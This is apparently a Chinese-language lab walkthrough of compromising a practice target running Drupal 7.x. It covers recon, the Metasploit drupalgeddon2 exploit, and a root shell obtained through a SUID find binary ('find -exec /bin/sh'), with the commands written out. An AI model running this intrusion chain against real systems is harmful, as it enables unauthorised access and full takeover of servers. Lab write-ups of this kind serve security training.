1.收集信息cms信息 使用的是Drupal的cms端口信息 开开启了22端口,80端口,111端口目录信息 扫到敏感目录 http://192.168.0.119/robots.txt通过cewl收集敏感信息并生成字典cewl http://192.168.0.119 -w passwd.txt2.漏洞分析与利用通过robots.txt查看敏感目录内容获取中重要信息可以从uprgade.txt看出,使用的cms是版本为7.x的Drupal搜索相关漏洞进入msfconsle ——> search Drupal尝试使用最新的,rank为execllent的payload: exploit/unix/webapp/drupal_drupalgeddon2使用该payload后查看目标是否在可攻击版本范围内设置攻击目标,得到session会话3.尝试提权内核作为最后杀招不得已再用。首先联想到常见几种提权方式,suid提权python -c 'import pty;pty.spawn("/bin/bash")' #利用python的pty获得一个完整的ttyfind / -perm -u=s -type f 2>/dev/null #将有suid权限的打印出来发现常用于usid提权的工具findcd /tmp #切换到tmp目录下touch luojun #创建lj文件find luojun -exec "whoami" \; #查询lj文件并执行whoami命令成功发现执行命令的是root权限find luojun -exec "/bin/bash" \; #将bash的shell反弹出来,发现失败了find luojun -exec "/bin/sh" \; #将sh的shell反弹出来,发现成功,获得root权限提权成功,接下来任意妄为寻找flag |
|